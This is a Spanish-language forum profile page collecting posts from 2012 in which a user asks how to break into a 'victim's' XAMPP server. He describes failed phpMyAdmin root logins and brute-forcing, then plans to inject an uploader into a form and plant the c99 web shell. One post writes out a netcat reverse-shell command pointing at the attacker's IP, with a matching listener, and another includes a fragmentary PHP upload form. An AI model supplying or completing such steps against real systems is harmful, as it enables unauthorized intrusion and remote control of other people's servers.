Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - varc

#1
muy bien paso a explicar los detalles: estoy usando la shell c99,el server usa linux y puedo subir archivos

estuve leyendo en los foros acerca de netcat.....y segun parece, tengo que subir el netcat al server con un .bat con un codigo parecido a este:

nc -d -e cmd.exe MIIP PUERTO

en MIIP pongo mi IP, y en PUERTO pongo un puerto para conectarme

como el server es linux dudo que funcione lo de cmd.exe (aunque realmente deconosco el tema)

y luego en MS-Dos pongo esto:

nc -vv -l -p PUERTO

de esta manera el netcat estaria a la escucha pero el problema seria ejecutar el .bat en la victima...


PD:esta informacion la saque de otros foros corrijanme si me equivoco
#2
muchas gracias lo probare  ;)
#3
alguien sabe cuales son las formas de ejecutar un archivo remotamente?
porque la idea es subir una shell al server y despues ejecutar algunos archivos pero no se como podria ejecutarlos :-\
#4
Nivel Web / Re: ayuda para subir shell
29 Mayo 2012, 20:05 PM
tenes razon, disculpa, es que soy un tipo muy apurado..... :rolleyes:
bueno ya lo estaba intentando con un codigo que encontre antes pero no funciona:


<form action="index.php" method=post enctype="multipart/form-data">
Ingrese aqui su archivo:<br>
<input type="file" name="archivo">
<input type="submit" value="Guardar">
</form>

<?php
$archivo 
$_FILES['archivo'];
$nombrefile $_FILES['archivo']['name'];
$rutatmp $_FILES['archivo']['tmp_name'];
$rutanueva "nombre de la carpeta en la que se guardaran los archivos/".$nombrefile;
?>



obviamente no funciona porque el form llama a otro archivo(index.php) pero lo que pregunto es si modificando el php se podria llamar a la shell y asi subirla
#5
Nivel Web / ayuda para subir shell
28 Mayo 2012, 19:19 PM
mi problema es el siguiente:
la victima tiene un servidor xampp que quiero hackear pero el problema es que no puedo acceder porque en el phpmyadmin pongo el usuario "root" y no me deja entrar.

pense en usar bruteforces pero tardaba demasiado. asique la unica alternativa que me parecio mas conveniente fue inyectar codigo en uno de los formularios que tiene la pagina del server y asi hacer una especie de uploader pero no tengo idea de como se hace :huh:
antes que nada, se puede hacer eso? y si se puede estaria bueno ver como es el codigo  ;D